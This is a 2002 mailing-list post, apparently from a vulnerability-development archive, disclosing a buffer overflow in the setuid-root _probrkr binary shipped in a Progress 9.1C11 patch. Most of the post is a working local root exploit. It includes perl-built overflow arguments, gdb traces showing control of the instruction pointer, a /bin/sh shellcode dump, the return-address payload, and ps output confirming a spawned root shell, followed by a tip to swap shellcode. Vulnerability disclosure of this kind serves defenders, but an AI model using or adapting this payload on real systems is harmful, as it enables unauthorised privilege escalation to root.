Vulnerability Development mailing list archives
latest Progress patch has suid issues AGAIN.
From: KF <dotslash () snosoft com>
Date: Wed, 01 May 2002 22:36:38 -0700
Due to a flat out NO response offer once again to help Progress with their security issues they have not been notified about this issue if there are any people from the PEG reading please clue your friends in... http://www.peg.com/usgrp.html
-KF
Progress 9.1C11 Patch date 2002/04/26 http://www.progress.com/patches/patchlst/91C-178v.htm Once again by ignoring my warnings and suggestions and even offers to audit code prior to release for the public, Progress Software has happened upon a security hole. If you will recall from last month progress likes to GIVE you suids in their patches. Last month they GAVE us sqlcpp. Well they decided that in this patch that would fix sqlcpp as you can see here... 20020403-020 * utilities: sqlload, sqldump, sqlschema Security Bug: A buffer overflow has been reported in the sqlcpp program included with Progress, used as a SQL preprocessor. and then be soooo generous as to GIVE you yet another suid binary and yet ANOTHER security risk to worry about. I can't say that this file was part of my last release... looks like fun though. [root@ghetto bin]# ls -al _probrkr -rwsrwxr-x 1 1089 110 268306 Apr 22 15:23 _probrkr [root@ghetto bin]# ./_probrkr -S `perl -e 'print "A" x 100'` 01:19:15 (pid 32638) BROKER Service: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ** Unable to create dataserv.lg, errno = 13 (609) 01:19:15 (pid 32638) BROKER Service: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Unable to open or create dataserv.lg, error 13. (2257) 01:19:15 (pid 32638) BROKER Service: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ** Unable to create ds_32638.lg, errno = 13 (609) 01:19:15 (pid 32638) BROKER Service: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Unable to open or create ds_32638.lg, error 13. (2257) 01:19:15 (pid 32638) BROKER Service: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Unable to open dataserver log file. (2683) 01:19:15 (pid 32637) BROKER Service: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ** This process terminated with exit code 2. (8619) Hrmm lets try again. (gdb) r -S `perl -e 'print "A" x 564'` Starting program: /home/91c11/bin/./_probrkr -S `perl -e 'print "A" x 564'` Program received signal SIGSEGV, Segmentation fault. 0x08071725 in stncop () at eval.c:41 41 eval.c: No such file or directory. in eval.c (gdb) bt #0 0x08071725 in stncop () at eval.c:41 #1 0x080629e2 in dblgm () at eval.c:41 #2 0x20200a20 in ?? () at eval.c:41 Cannot access memory at address 0x41414141 Thats usually not good. =] (gdb) frame 2 #2 0x20200a20 in ?? () at eval.c:41 41 in eval.c (gdb) i r eax 0xbffff48b -1073744757 ecx 0xffffffed -19 edx 0x20202020 538976288 ebx 0x8079d28 134716712 esp 0xbffff1f0 0xbffff1f0 ebp 0x41414141 0x41414141 esi 0x2f 47 edi 0xbffff500 -1073744640 eip 0x20200a20 0x20200a20 (gdb) frame 3 Cannot access memory at address 0x41414141 that means its owned for sure I believe.... drop some shellcode on the stack ... do a lil ninja and viola (gdb) x/10s 0xbffffeba+10 0xbffffec4: "1À1Û°\027Í\200ë\037^\211v\b1À\210F\a\211F\f°\013\211ó\215N\b\215V\fÍ\2001Û\211Ø@Í\200èÜÿÿÿ/bin/sh" (gdb) r -S `perl -e 'print "\xc4\xfe\xff\xbf" x 150'` The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/91c11/bin/./_probrkr -S `perl -e 'print "\xc4\xfe\xff\xbf" x 150'` 01:02:59 (pid 1463) BROKER Service: Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿ 1À1Û°Íë^1ÀFF ° óV Í1ÛØ@ÍèÜÿÿÿ/bin/sh Hrmm thats hardly the output I was expecting ... an associate of mine noted that you could tamper with the inputs of various functions. One things you really need to note above is "01:02:59 (pid 1463)" Something was spawned as a child process... check the pid 1463... root 1463 1460 0 01:02 pts/0 00:00:00 /bin/sh how nice a shell spawned by the _probrkr parent id root 1460 1413 0 01:02 pts/0 00:00:00 /home/91c11/bin/./_probrkr -S Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ do a quick strace on it ... [40057a01] --- SIGTTIN (Stopped (tty input)) --- [400578ef] rt_sigaction(SIGTTIN, {SIG_IGN}, {SIG_DFL}, 8) = 0 [4010fac4] ioctl(255, 0x540f, [1460]) = 0 [400578ef] rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_IGN}, 8) = 0 [40057a01] kill(0, SIGTTIN) = 0 [40057a01] --- SIGTTIN (Stopped (tty input)) --- If you strace that bash shell you can see that it is flipping out about not having a tty... progress won't let us type in an iteractive sh prompt so use some other type of shellcode. Have fun. -KF
Current thread:
- latest Progress patch has suid issues AGAIN. KF (May 01)